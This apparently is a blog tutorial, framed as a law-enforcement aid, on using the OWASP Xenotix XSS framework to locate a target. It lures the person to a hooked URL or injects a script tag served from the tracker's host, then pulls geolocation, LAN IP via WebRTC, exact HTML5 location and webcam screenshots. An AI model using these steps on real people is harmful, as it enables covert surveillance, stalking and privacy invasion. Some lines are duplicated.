Today I will discuss few methods that Law Enforcement
agencies can use to track down Cyber Criminals. The methods which are discussed
here includes approximate triangulation as well as pin point location (depends
on Social Engineering and User Interaction) to track down a Cyber Criminal.
1.
Send him an Email with the URL and convince him
to visit it.
2. Send him the URL itself and convince him to visit it.
3. Leverage XSS Vulnerabilities in website visited by the victim.
Requirement
Cyber Criminals obviously do have presence in the internet. Let’s
refer the Cyber Criminal as Victim throughout this post. Most of the methods I discuss
here does not require victim interaction except for the social engineering
method.
All the methods require the victim to visit a URL for successfully
tracking him/her.
Methods
The methods I describe here make use of OWASP Xenotix XSS
Exploit Framework. Xenotix is an Advanced Cross Site Scripting Detection and
Exploitation Framework. However we can leverage some features of OWASP Xenotix to
track down a Cyber Criminal too.
Step 1
Craft a xooked URL with Xenotix or inject Xenotix xook
script to any page.
This tutorial requires the latest version of OWASP Xenotix.
Get v6.1 from here: xenotix.in
Open Xenotix, go to Settings -> Configure Server
Give a Public IP that is exposed to internet. For the sake
of the demo I will be using a LAN IP in a virtual environment. Give any port
number and run the server.
Now here you can either give your victim the xook URL which
is http://192.168.56.1:5005/xook.html
or inject the xook script (<script
src="http://192.168.56.1:5005/xook.js"></script>) to some
Fancy looking page.
Step 2
Think about how can you make your victim to visit a URL. There are couple of ways
Think about how can you make your victim to visit a URL. There are couple of ways
2. Send him the URL itself and convince him to visit it.
3. Leverage XSS Vulnerabilities in website visited by the victim.
And a lot more ways depending on your creativity and
imagination
Step 3
There are couple of modules in Xenotix that will help you
track a victim.
Using IP2Geolocation Module
Using IP2Geolocation Module
Go to Information Gathering -> Victim Fingerprinting
-> IP2Geolocation
This module gives approximate location of the victim. Once
you click Fingerprint button, you will get a response like this which depicts a
lot of information about the victim.
Using IP2 Location
Module
Go to Information Gathering -> Victim Fingerprinting
->IP2Location
This is a bit more accurate module but requires the victim
to allow pop ups in browser. Click on the Fingerprint button and you will get
the following information about your victim.
Check out this video on YouTube to get familiar with these
modules.
Using the Network IP (WebRTC)
Module
Go to Information Gathering -> Network -> Network IP
(WebRTC)
Suppose you have identified the Public IP of the victim which
is for example say belongs to an Internet Cafe Network. You need to identify
from which machine the attack is coming from. The Network IP module in Xenotix
will get you the exact LAN IP of the victim’s system. Clicking on Inject will
return you the LAN IP of the victim.
Using Geolocation
HTML5 API
Go to XSS Exploitation -> Social Engineering -> HTML5
Geolocation API
This module will give you the pin point location of the
victim. However this module requires victim interaction. The downfall of this
method is that the browser will show a pop up to victim which tells that the
site needs to get your location.
This basically test the common sense of the victim so the
result is not guaranteed. Once you click on Inject and the victim allows the
API to execute, you will get his exact location.
Using Live WebCam
Screenshot Module
Go to XSS Exploitation -> Social Engineering -> Live
WebCam Screenshot
This module also depends on the common sense of the victim.
If he accepts the WebCam request pop up from the browser and he got a web cam
connected to his system, you will get an idea about how he looks like.
Once you click on Inject and the victim allows sharing of
the Web Cam, you will get Screenshots form WebCam.
Conclusion
Most of the methods rely on the victim’s IP. If the victim’s
IP is not real then these methods are pretty much useless. Modern Cyber
Criminals are intelligent enough to use sophisticated Proxies to hide their
identity. But still Law enforcement agencies and detectives can give a try to
these methods. After all it depends a lot on common sense!
NOTE: Use latest version of OWASP Xenotix, old versions have
few bugs that was addressed in the new version.
Happy Hacking!
No comments:
Post a Comment